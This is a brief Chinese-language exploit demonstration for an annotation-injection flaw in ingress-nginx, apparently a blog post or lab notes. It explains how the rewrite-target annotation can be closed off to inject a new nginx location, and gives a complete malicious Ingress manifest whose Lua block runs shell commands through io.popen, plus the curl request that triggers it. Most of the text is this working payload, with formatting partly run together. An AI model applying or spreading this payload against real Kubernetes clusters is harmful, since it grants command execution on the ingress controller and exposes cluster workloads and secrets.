安装
安装ingress-nginx
wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.8.4/deploy/static/provider/cloud/deploy.yamlk apply -f deploy.yaml原理
nginx.ingress.kubernetes.io/rewrite-target标签会在nginx配置进行插入字符串,我们通过注入自己的恶意字符串,并且进行闭合,并且利用了lua脚本执行命令的功能,即可注入一个执行命令的路由来完成执行命令
nginx.ingress.kubernetes.io/rewrite-target: |execute-command/ last; #用于将所有请求重定向到/execute-command}#注入了一个新路径,用于通过lua脚本执行命令location execute-command/ {content_by_lua_block {local handle = io.popen("ls -l")local result = handle:read("*a")handle:close()ngx.say(result)}}location /fs/{
演示
部署的ingress如下所示
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:name: ingress-exploitannotations:kubernetes.io/ingress.class: "nginx"nginx.ingress.kubernetes.io/rewrite-target: |execute-command/ last;}location execute-command/ {content_by_lua_block {local handle = io.popen("ls -l")local result = handle:read("*a")handle:close()ngx.say(result)}}location /fs/{spec:rules:- host: k8s.evil.mehttp:paths:- path: /pathType: Prefixbackend:service:name: exploitport:number: 8080
在容器中可以看到
curl --header "Host: k8s.evil.me" http://10.98.219.148/
